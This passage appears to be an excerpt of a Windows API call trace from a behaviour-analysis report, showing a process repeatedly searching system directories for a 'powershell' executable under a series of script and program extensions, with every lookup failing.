	[0325.244] SetErrorMode (uMode=0x1) returned 0x1
	[0325.245] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.253] SetErrorMode (uMode=0x1) returned 0x1
	[0326.170] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.170] SetErrorMode (uMode=0x1) returned 0x1
	[0326.170] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.178] SetErrorMode (uMode=0x1) returned 0x1
	[0326.179] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.180] SetErrorMode (uMode=0x1) returned 0x1
	[0326.180] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.189] SetErrorMode (uMode=0x1) returned 0x1
	[0326.190] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.190] SetErrorMode (uMode=0x1) returned 0x1
	[0326.190] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.198] SetErrorMode (uMode=0x1) returned 0x1
	[0326.199] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.200] SetErrorMode (uMode=0x1) returned 0x1
	[0326.200] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.208] SetErrorMode (uMode=0x1) returned 0x1
	[0326.209] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.209] SetErrorMode (uMode=0x1) returned 0x1
	[0326.209] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.091] SetErrorMode (uMode=0x1) returned 0x1
	[0327.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.092] SetErrorMode (uMode=0x1) returned 0x1
	[0327.092] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.092] SetErrorMode (uMode=0x1) returned 0x1
	[0327.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.093] SetErrorMode (uMode=0x1) returned 0x1
	[0327.093] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.093] SetErrorMode (uMode=0x1) returned 0x1
	[0327.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.094] SetErrorMode (uMode=0x1) returned 0x1
	[0327.094] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.094] SetErrorMode (uMode=0x1) returned 0x1
	[0327.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.094] SetErrorMode (uMode=0x1) returned 0x1
	[0327.094] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.094] SetErrorMode (uMode=0x1) returned 0x1
	[0327.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.095] SetErrorMode (uMode=0x1) returned 0x1
	[0327.095] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.095] SetErrorMode (uMode=0x1) returned 0x1
	[0327.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.095] SetErrorMode (uMode=0x1) returned 0x1
	[0327.095] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.096] SetErrorMode (uMode=0x1) returned 0x1
	[0327.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.096] SetErrorMode (uMode=0x1) returned 0x1
	[0327.096] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.096] SetErrorMode (uMode=0x1) returned 0x1
	[0327.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.096] SetErrorMode (uMode=0x1) returned 0x1
	[0327.097] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.097] SetErrorMode (uMode=0x1) returned 0x1
	[0327.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.097] SetErrorMode (uMode=0x1) returned 0x1
	[0327.097] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.097] SetErrorMode (uMode=0x1) returned 0x1
	[0327.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.098] SetErrorMode (uMode=0x1) returned 0x1
	[0327.098] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.098] SetErrorMode (uMode=0x1) returned 0x1
	[0327.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.098] SetErrorMode (uMode=0x1) returned 0x1
	[0327.098] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.099] SetErrorMode (uMode=0x1) returned 0x1
	[0327.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.099] SetErrorMode (uMode=0x1) returned 0x1
	[0327.099] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.099] SetErrorMode (uMode=0x1) returned 0x1
	[0327.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.099] SetErrorMode (uMode=0x1) returned 0x1
	[0327.100] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.100] SetErrorMode (uMode=0x1) returned 0x1
	[0327.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.100] SetErrorMode (uMode=0x1) returned 0x1
	[0327.100] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.100] SetErrorMode (uMode=0x1) returned 0x1
	[0327.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.101] SetErrorMode (uMode=0x1) returned 0x1
	[0327.101] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.101] SetErrorMode (uMode=0x1) returned 0x1
	[0327.101] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.101] SetErrorMode (uMode=0x1) returned 0x1
	[0327.101] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.102] SetErrorMode (uMode=0x1) returned 0x1
	[0327.102] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.102] SetErrorMode (uMode=0x1) returned 0x1
	[0327.102] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.102] SetErrorMode (uMode=0x1) returned 0x1
	[0327.102] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.102] SetErrorMode (uMode=0x1) returned 0x1
	[0327.102] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.103] SetErrorMode (uMode=0x1) returned 0x1
	[0327.103] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.103] SetErrorMode (uMode=0x1) returned 0x1
	[0327.103] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.103] SetErrorMode (uMode=0x1) returned 0x1
	[0327.103] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.104] SetErrorMode (uMode=0x1) returned 0x1
	[0327.104] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.104] SetErrorMode (uMode=0x1) returned 0x1
	[0327.105] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.105] SetErrorMode (uMode=0x1) returned 0x1
	[0327.105] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.105] SetErrorMode (uMode=0x1) returned 0x1
	[0327.105] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.105] SetErrorMode (uMode=0x1) returned 0x1
	[0327.105] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.106] SetErrorMode (uMode=0x1) returned 0x1
	[0327.106] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.106] SetErrorMode (uMode=0x1) returned 0x1
	[0327.106] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.106] SetErrorMode (uMode=0x1) returned 0x1
	[0327.106] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.106] SetErrorMode (uMode=0x1) returned 0x1
	[0327.107] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.107] SetErrorMode (uMode=0x1) returned 0x1
	[0327.107] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.107] SetErrorMode (uMode=0x1) returned 0x1
